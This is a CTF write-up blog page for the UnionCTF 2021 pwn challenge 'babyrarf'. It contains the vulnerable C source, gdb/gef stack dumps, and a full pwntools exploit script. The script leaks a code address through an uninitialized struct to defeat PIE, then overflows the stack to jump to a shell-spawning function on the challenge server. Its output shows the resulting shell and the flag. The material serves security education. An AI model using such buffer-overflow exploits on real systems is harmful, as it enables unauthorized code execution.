<!doctype html>
<html lang="en-us">
  <head>
    <title>[Unionctf 2021 - pwn] babyrarf // ret2school</title>
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.68.3" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="nasm" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://ret2school.github.io/css/main.min.88e7083eff65effb7485b6e6f38d10afbec25093a6fac42d734ce9024d3defbd.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="[Unionctf 2021 - pwn] babyrarf"/>
<meta name="twitter:description" content="Welcome guys,
This Write-Up is about de first pwn challenge of unionctf: babyrarf. It was a really easy challenge with a stack based buffer overflow. The source code was provided so, no need to reverse the binary :).
Let&rsquo;s take a look at the src!
#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;#include &lt;stdint.h&gt;#include &lt;unistd.h&gt; typedef struct attack { uint64_t id; uint64_t dmg; } attack; typedef struct character { char name[10]; int health; } character; uint8_t score; int read_int(){ char buf[10]; fgets(buf, 10, stdin); return atoi(buf); } void get_shell(){ execve(&#34;/bin/sh&#34;, NULL, NULL); } attack choose_attack(){ attack a; int id; puts(&#34;Choose an attack:\n&#34;); puts(&#34;1."/>

    <meta property="og:title" content="[Unionctf 2021 - pwn] babyrarf" />
<meta property="og:description" content="Welcome guys,
This Write-Up is about de first pwn challenge of unionctf: babyrarf. It was a really easy challenge with a stack based buffer overflow. The source code was provided so, no need to reverse the binary :).
Let&rsquo;s take a look at the src!
#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;#include &lt;stdint.h&gt;#include &lt;unistd.h&gt; typedef struct attack { uint64_t id; uint64_t dmg; } attack; typedef struct character { char name[10]; int health; } character; uint8_t score; int read_int(){ char buf[10]; fgets(buf, 10, stdin); return atoi(buf); } void get_shell(){ execve(&#34;/bin/sh&#34;, NULL, NULL); } attack choose_attack(){ attack a; int id; puts(&#34;Choose an attack:\n&#34;); puts(&#34;1." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ret2school.github.io/post/babyrarf/" />
<meta property="article:published_time" content="2021-02-21T00:00:00+00:00" />
<meta property="article:modified_time" content="2021-02-21T00:00:00+00:00" />


  </head>
  <body>
    <header class="app-header">
      <a href="https://ret2school.github.io"><img class="app-header-avatar" src="/pic.jpeg" alt="nasm" /></a>
      <h1>ret2school</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             / 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>Just a bunch of french ctf players</p>
      <div class="app-header-social">
        
          <a target="_blank" href="https://github.com/ret2school" rel="noreferrer noopener"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg></a>
        
          <a target="_blank" href="https://twitter.com/nasm_re" rel="noreferrer noopener"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg></a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">[Unionctf 2021 - pwn] babyrarf</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Feb 21, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          6 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line>
</svg>
              <a class="tag" href="https://ret2school.github.io/tags/ctf/">ctf</a>
              <a class="tag" href="https://ret2school.github.io/tags/pwn/">pwn</a>
              <a class="tag" href="https://ret2school.github.io/tags/nasm/">nasm</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <p>Welcome guys,</p>
<p>This Write-Up is about de first pwn challenge of <a href="https://ctf.cr0wn.uk">unionctf</a>: <a href="">babyrarf</a>.
It was a really easy challenge with a stack based buffer overflow. The source code was provided so, no need to reverse the binary :).</p>
<p>Let&rsquo;s take a look at the src!</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#ff79c6">#include</span> <span style="color:#ff79c6">&lt;stdio.h&gt;</span><span style="color:#ff79c6">
</span><span style="color:#ff79c6">#include</span> <span style="color:#ff79c6">&lt;stdlib.h&gt;</span><span style="color:#ff79c6">
</span><span style="color:#ff79c6">#include</span> <span style="color:#ff79c6">&lt;stdint.h&gt;</span><span style="color:#ff79c6">
</span><span style="color:#ff79c6">#include</span> <span style="color:#ff79c6">&lt;unistd.h&gt;</span><span style="color:#ff79c6">
</span><span style="color:#ff79c6"></span>
<span style="color:#ff79c6">typedef</span> <span style="color:#ff79c6">struct</span> attack {
    uint64_t id;
    uint64_t dmg;
} attack;

<span style="color:#ff79c6">typedef</span> <span style="color:#ff79c6">struct</span> character {
    <span style="color:#8be9fd">char</span> name[<span style="color:#bd93f9">10</span>];
    <span style="color:#8be9fd">int</span> health;
} character;

uint8_t score;

<span style="color:#8be9fd">int</span> <span style="color:#50fa7b">read_int</span>(){
    <span style="color:#8be9fd">char</span> buf[<span style="color:#bd93f9">10</span>];
    fgets(buf, <span style="color:#bd93f9">10</span>, stdin);
    <span style="color:#ff79c6">return</span> atoi(buf);
}

<span style="color:#8be9fd">void</span> <span style="color:#50fa7b">get_shell</span>(){
    execve(<span style="color:#f1fa8c">&#34;/bin/sh&#34;</span>, <span style="color:#8be9fd;font-style:italic">NULL</span>, <span style="color:#8be9fd;font-style:italic">NULL</span>);
}

attack <span style="color:#50fa7b">choose_attack</span>(){
    attack a;
    <span style="color:#8be9fd">int</span> id;
    puts(<span style="color:#f1fa8c">&#34;Choose an attack:</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
    puts(<span style="color:#f1fa8c">&#34;1. Knife</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
    puts(<span style="color:#f1fa8c">&#34;2. A bigger knife</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
    puts(<span style="color:#f1fa8c">&#34;3. Her Majesty&#39;s knife</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
    puts(<span style="color:#f1fa8c">&#34;4. A cr0wn</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
    id <span style="color:#ff79c6">=</span> read_int();
    <span style="color:#ff79c6">if</span> (id <span style="color:#ff79c6">==</span> <span style="color:#bd93f9">1</span>){
        a.id <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">1</span>;
        a.dmg <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">10</span>;
    }
    <span style="color:#ff79c6">else</span> <span style="color:#ff79c6">if</span> (id <span style="color:#ff79c6">==</span> <span style="color:#bd93f9">2</span>){
        a.id <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">2</span>;
        a.dmg <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">20</span>;
    }
    <span style="color:#ff79c6">else</span> <span style="color:#ff79c6">if</span> (id <span style="color:#ff79c6">==</span> <span style="color:#bd93f9">3</span>){
        a.id <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">3</span>;
        a.dmg <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">30</span>;
    }
    <span style="color:#ff79c6">else</span> <span style="color:#ff79c6">if</span> (id <span style="color:#ff79c6">==</span> <span style="color:#bd93f9">4</span>){
        <span style="color:#ff79c6">if</span> (score <span style="color:#ff79c6">==</span> <span style="color:#bd93f9">0</span>){
            puts(<span style="color:#f1fa8c">&#34;l0zers don&#39;t get cr0wns</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
        }
        <span style="color:#ff79c6">else</span>{
            a.id <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">4</span>;
            a.dmg <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">40</span>;
        }
    }
    <span style="color:#ff79c6">else</span>{
        puts(<span style="color:#f1fa8c">&#34;Please select a valid attack next time</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
        a.id <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">0</span>;
        a.dmg <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">0</span>;
    }
    <span style="color:#ff79c6">return</span> a;
}

<span style="color:#8be9fd">int</span> <span style="color:#50fa7b">main</span>(){
    character player <span style="color:#ff79c6">=</span> { .health <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">100</span>};
    character boss <span style="color:#ff79c6">=</span> { .health <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">100</span>, .name <span style="color:#ff79c6">=</span> <span style="color:#f1fa8c">&#34;boss&#34;</span>};
    attack a;
    <span style="color:#8be9fd">int</span> dmg;

    setvbuf(stdin, <span style="color:#8be9fd;font-style:italic">NULL</span>, _IONBF, <span style="color:#bd93f9">0</span>);
    setvbuf(stdout, <span style="color:#8be9fd;font-style:italic">NULL</span>, _IONBF, <span style="color:#bd93f9">0</span>);
    srand(<span style="color:#bd93f9">0</span>);

    puts(<span style="color:#f1fa8c">&#34;You are fighting the rarf boss!</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
    puts(<span style="color:#f1fa8c">&#34;What is your name?</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
    fgets(player.name, <span style="color:#bd93f9">10</span>, stdin);

    score <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">10</span>;

    <span style="color:#ff79c6">while</span> (score <span style="color:#ff79c6">&lt;</span> <span style="color:#bd93f9">100</span>){
        a <span style="color:#ff79c6">=</span> choose_attack();
        printf(<span style="color:#f1fa8c">&#34;You choose attack %llu</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>, a.id);
        printf(<span style="color:#f1fa8c">&#34;You deal %llu dmg</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>, a.dmg);
        boss.health <span style="color:#ff79c6">-=</span> a.dmg;
        dmg <span style="color:#ff79c6">=</span> rand() <span style="color:#ff79c6">%</span> <span style="color:#bd93f9">100</span>;
        printf(<span style="color:#f1fa8c">&#34;The boss deals %llu dmg</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>, dmg);
        player.health <span style="color:#ff79c6">-=</span> dmg;
        <span style="color:#ff79c6">if</span> (player.health <span style="color:#ff79c6">&gt;</span> boss.health){
            puts(<span style="color:#f1fa8c">&#34;You won!</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
            score <span style="color:#ff79c6">+=</span> <span style="color:#bd93f9">1</span>;
        }
        <span style="color:#ff79c6">else</span>{
            puts(<span style="color:#f1fa8c">&#34;You lost!</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
            score <span style="color:#ff79c6">-=</span> <span style="color:#bd93f9">1</span>;
        }
        player.health <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">100</span>;
        boss.health <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">100</span>;
    }

    puts(<span style="color:#f1fa8c">&#34;Congratulations! You may now declare yourself the winner:</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
    fgets(player.name, <span style="color:#bd93f9">48</span>, stdin);
    <span style="color:#ff79c6">return</span> <span style="color:#bd93f9">0</span>;
}
</code></pre></div><p>It&rsquo;s basically some kind of game, we have to win a lot of times to display <code>Congratulations! You may now declare yourself the winner</code>. And when we reach this part we can trigger a buffer overflow with a call to fgets (<code>fgets(player.name, 48, stdin);</code>). We notice too the get_shell function (maybe we will have to jump on ?).</p>
<p>Let&rsquo;s take a look at gdb:</p>
<pre><code>──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffdf48│+0x0000: 0x00007ffff7dd30b3  →  &lt;__libc_start_main+243&gt; mov edi, eax	 ← $rsp
0x00007fffffffdf50│+0x0008: 0x00007ffff7ffc620  →  0x0005081200000000
0x00007fffffffdf58│+0x0010: 0x00007fffffffe038  →  0x00007fffffffe357  →  &quot;/home/nasm/dist/babyrarf&quot;
0x00007fffffffdf60│+0x0018: 0x0000000100000000
0x00007fffffffdf68│+0x0020: 0x00005555555552e4  →  &lt;main+0&gt; push rbp
0x00007fffffffdf70│+0x0028: 0x00005555555554d0  →  &lt;__libc_csu_init+0&gt; endbr64 
0x00007fffffffdf78│+0x0030: 0xdb21ca7fd193f05a
0x00007fffffffdf80│+0x0038: 0x00005555555550b0  →  &lt;_start+0&gt; endbr64 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x5555555552de &lt;choose_attack+234&gt; mov    rdx, QWORD PTR [rbp-0x18]
   0x5555555552e2 &lt;choose_attack+238&gt; leave  
   0x5555555552e3 &lt;choose_attack+239&gt; ret    
 → 0x5555555552e4 &lt;main+0&gt;         push   rbp
   0x5555555552e5 &lt;main+1&gt;         mov    rbp, rsp
   0x5555555552e8 &lt;main+4&gt;         sub    rsp, 0x40
   0x5555555552ec &lt;main+8&gt;         mov    QWORD PTR [rbp-0x20], 0x0
   0x5555555552f4 &lt;main+16&gt;        mov    QWORD PTR [rbp-0x18], 0x0
   0x5555555552fc &lt;main+24&gt;        mov    DWORD PTR [rbp-0x14], 0x64
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: &quot;babyrarf&quot;, stopped 0x5555555552e4 in main (), reason: BREAKPOINT
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x5555555552e4 → main()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  
</code></pre><p>And at the call to fgets:</p>
<pre><code>   0x55555555537d &lt;main+153&gt;       lea    rax, [rbp-0x20]
   0x555555555381 &lt;main+157&gt;       mov    esi, 0xa
   0x555555555386 &lt;main+162&gt;       mov    rdi, rax
 → 0x555555555389 &lt;main+165&gt;       call   0x555555555060 &lt;fgets@plt&gt;
   ↳  0x555555555060 &lt;fgets@plt+0&gt;    jmp    QWORD PTR [rip+0x2fca]        # 0x555555558030 &lt;fgets@got.plt&gt;
      0x555555555066 &lt;fgets@plt+6&gt;    push   0x3
      0x55555555506b &lt;fgets@plt+11&gt;   jmp    0x555555555020
      0x555555555070 &lt;execve@plt+0&gt;   jmp    QWORD PTR [rip+0x2fc2]        # 0x555555558038 &lt;execve@got.plt&gt;
      0x555555555076 &lt;execve@plt+6&gt;   push   0x4
      0x55555555507b &lt;execve@plt+11&gt;  jmp    0x555555555020
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
fgets@plt (
   $rdi = 0x00007fffffffdf20 → 0x0000000000000000,
   $rsi = 0x000000000000000a,
   $rdx = 0x00007ffff7f97980 → 0x00000000fbad208b
)
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: &quot;babyrarf&quot;, stopped 0x555555555389 in main (), reason: SINGLE STEP
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555555389 → main()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  
</code></pre><p>So main_ret_addr minus player.name is equal to: <code>0x00007fffffffdf48 - 0x00007fffffffdf20 = 40 </code>.
So we have basically a padding of 40 bytes before the return address, and according to the last fgets, we can only enter 48 bytes.
We can so overwrite only the return address.</p>
<p>Now we can take a look at the permissions:</p>
<pre><code>gef➤  checksec
[+] checksec for '/home/nasm/dist/babyrarf'
Canary                        : ✘ 
NX                            : ✓ 
PIE                           : ✓ 
Fortify                       : ✘ 
RelRO                         : Partial
</code></pre><p>We can see, the binary is PIE based, so in order to jump on get_shell we need to leak some binary&rsquo;s functions.
To do so we can mind the code of <code>choose_attack</code> function:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">attack <span style="color:#50fa7b">choose_attack</span>(){
    attack a;
    <span style="color:#8be9fd">int</span> id;
    <span style="color:#6272a4">/* Some print stuff */</span>
    id <span style="color:#ff79c6">=</span> read_int(); <span style="color:#6272a4">// It is readinf the type of weapons we want
</span><span style="color:#6272a4"></span>    
    <span style="color:#6272a4">/* Here it is handling properly dammage and weapon type */</span>

    <span style="color:#ff79c6">else</span> <span style="color:#ff79c6">if</span> (id <span style="color:#ff79c6">==</span> <span style="color:#bd93f9">4</span>){
        <span style="color:#ff79c6">if</span> (score <span style="color:#ff79c6">==</span> <span style="color:#bd93f9">0</span>){
            puts(<span style="color:#f1fa8c">&#34;l0zers don&#39;t get cr0wns</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
        }
        <span style="color:#ff79c6">else</span>{
            a.id <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">4</span>;
            a.dmg <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">40</span>;
        }
    }
    <span style="color:#ff79c6">else</span>{
        puts(<span style="color:#f1fa8c">&#34;Please select a valid attack next time</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>);
        a.id <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">0</span>;
        a.dmg <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">0</span>;
    }
    <span style="color:#ff79c6">return</span> a;
}
</code></pre></div><p>The interesting part is that when our score is zero and that we choose the fourth weapon, the id et dmg fields are not initialized.
And so it&rsquo;s returning a non initialized struct that it will print just next in the main function:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">    <span style="color:#6272a4">/* ... */</span>
    a <span style="color:#ff79c6">=</span> choose_attack();
    printf(<span style="color:#f1fa8c">&#34;You choose attack %llu</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>, a.id);
    printf(<span style="color:#f1fa8c">&#34;You deal %llu dmg</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>, a.dmg);
    <span style="color:#6272a4">/*...*/</span>
</code></pre></div><p>Uninitialized structures are very useful to obtain leaks because their content is depending of the ancient stackframes which have stored local variables and especially useful pointers.
And when we try to leak these datas, we can see that a.id displays the address of <code>__lib_csu_init</code>.
So we just need to leak the address of <code>__lib_csu_init</code> to compute the base address of the binary and so the address of <code>get_shell</code>.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#ff79c6">from</span> pwn <span style="color:#ff79c6">import</span> <span style="color:#ff79c6">*</span>

<span style="color:#6272a4">#p = process(&#34;babyrarf&#34;)</span>

r <span style="color:#ff79c6">=</span> remote(<span style="color:#f1fa8c">&#39;35.204.144.114&#39;</span>, <span style="color:#bd93f9">1337</span>)
e <span style="color:#ff79c6">=</span> ELF(<span style="color:#f1fa8c">&#39;babyrarf&#39;</span>)

set_ <span style="color:#ff79c6">=</span> False
base <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">0</span>
csu_leak <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">0</span>

<span style="color:#ff79c6">def</span> <span style="color:#50fa7b">padd</span>(d):
    <span style="color:#ff79c6">return</span> d <span style="color:#ff79c6">+</span> <span style="color:#f1fa8c">&#39;</span><span style="color:#f1fa8c">\00</span><span style="color:#f1fa8c">&#39;</span><span style="color:#ff79c6">*</span>(<span style="color:#bd93f9">8</span><span style="color:#ff79c6">-</span><span style="color:#8be9fd;font-style:italic">len</span>(d))

<span style="color:#ff79c6">print</span>(r<span style="color:#ff79c6">.</span>recvuntil(<span style="color:#f1fa8c">&#34;What is your name?</span><span style="color:#f1fa8c">\n\n</span><span style="color:#f1fa8c">&#34;</span>))
r<span style="color:#ff79c6">.</span>sendline(<span style="color:#f1fa8c">&#34;nasm&#34;</span>)
<span style="color:#ff79c6">print</span>(r<span style="color:#ff79c6">.</span>recvuntil(<span style="color:#f1fa8c">&#34;4. A cr0wn</span><span style="color:#f1fa8c">\n\n</span><span style="color:#f1fa8c">&#34;</span>))
r<span style="color:#ff79c6">.</span>sendline(<span style="color:#f1fa8c">&#34;1&#34;</span>)

<span style="color:#ff79c6">while</span> True:
    a <span style="color:#ff79c6">=</span> r<span style="color:#ff79c6">.</span>recvuntil(<span style="color:#f1fa8c">&#34;4. A cr0wn</span><span style="color:#f1fa8c">\n\n</span><span style="color:#f1fa8c">&#34;</span>, timeout<span style="color:#ff79c6">=</span><span style="color:#bd93f9">1</span>)

    <span style="color:#ff79c6">if</span> <span style="color:#ff79c6">not</span> a:
        <span style="color:#ff79c6">break</span>
    <span style="color:#ff79c6">print</span>(a)
    
    <span style="color:#ff79c6">if</span> <span style="color:#ff79c6">not</span> set_:
        r<span style="color:#ff79c6">.</span>sendline(<span style="color:#f1fa8c">&#34;4&#34;</span>)
    <span style="color:#ff79c6">else</span>:
        r<span style="color:#ff79c6">.</span>sendline(<span style="color:#f1fa8c">&#34;1&#34;</span>)

    b <span style="color:#ff79c6">=</span> r<span style="color:#ff79c6">.</span>recvuntil(<span style="color:#f1fa8c">&#34;You choose attack &#34;</span>)

    <span style="color:#ff79c6">if</span> <span style="color:#f1fa8c">&#34;l0zers don&#39;t get cr0wns&#34;</span> <span style="color:#ff79c6">in</span> b:
        leak_csu <span style="color:#ff79c6">=</span> <span style="color:#8be9fd;font-style:italic">int</span>(padd(r<span style="color:#ff79c6">.</span>recvline()<span style="color:#ff79c6">.</span>replace(<span style="color:#f1fa8c">&#34;</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>, <span style="color:#f1fa8c">&#34;&#34;</span>)))
        <span style="color:#ff79c6">print</span>(<span style="color:#f1fa8c">&#34;leak_csu={}&#34;</span><span style="color:#ff79c6">.</span>format(<span style="color:#8be9fd;font-style:italic">hex</span>(<span style="color:#8be9fd;font-style:italic">int</span>(leak_csu))))
        base <span style="color:#ff79c6">=</span> leak_csu <span style="color:#ff79c6">-</span> e<span style="color:#ff79c6">.</span>symbols[<span style="color:#f1fa8c">&#39;__libc_csu_init&#39;</span>]

        <span style="color:#ff79c6">print</span>(<span style="color:#f1fa8c">&#34;base: {}&#34;</span><span style="color:#ff79c6">.</span>format(<span style="color:#8be9fd;font-style:italic">hex</span>(base)))

        set_ <span style="color:#ff79c6">=</span> True

<span style="color:#ff79c6">print</span>(r<span style="color:#ff79c6">.</span>recvuntil(<span style="color:#f1fa8c">&#34;Congratulations! You may now declare yourself the winner:</span><span style="color:#f1fa8c">\n\n</span><span style="color:#f1fa8c">&#34;</span>))

<span style="color:#6272a4">#gdb.attach(p.pid)</span>
r<span style="color:#ff79c6">.</span>sendline(<span style="color:#f1fa8c">&#34;A&#34;</span><span style="color:#ff79c6">*</span><span style="color:#bd93f9">40</span> <span style="color:#ff79c6">+</span> p64(e<span style="color:#ff79c6">.</span>symbols[<span style="color:#f1fa8c">&#39;get_shell&#39;</span>] <span style="color:#ff79c6">+</span> base))
r<span style="color:#ff79c6">.</span>interactive()
</code></pre></div><p>We can compute compute the value of rand to avoid bruteforce, but I&rsquo;ve choosen to do not. So while it does not print <code>l0zers don't get cr0wns</code>, I&rsquo;m sending 4 for cr0wn and when it is teh case I get my leak of the csu and I compute the base address.
When It&rsquo;s done I&rsquo;m sending 1 because it sounds more speed and I wait to win.
And when I won I can trigger the buffer overflow and jmp on <code>get_shell</code>.</p>
<pre><code>You deal 40 dmg
The boss deals 70 dmg
You lost!

Choose an attack:

1. Knife

2. A bigger knife

3. Her Majesty's knife

4. A cr0wn


leak_csu=0x55b3b5b3a4d0
base: 0x55b3b5b39000
You deal 140736258161760 dmg
The boss deals 96 dmg
You lost!

Congratulations! You may now declare yourself the winner:


[*] Switching to interactive mode
$ cat /home/babyrarf/flag.txt
union{baby_rarf_d0o_d00_do0_doo_do0_d0o}
</code></pre><p>That&rsquo;s all folks :)</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
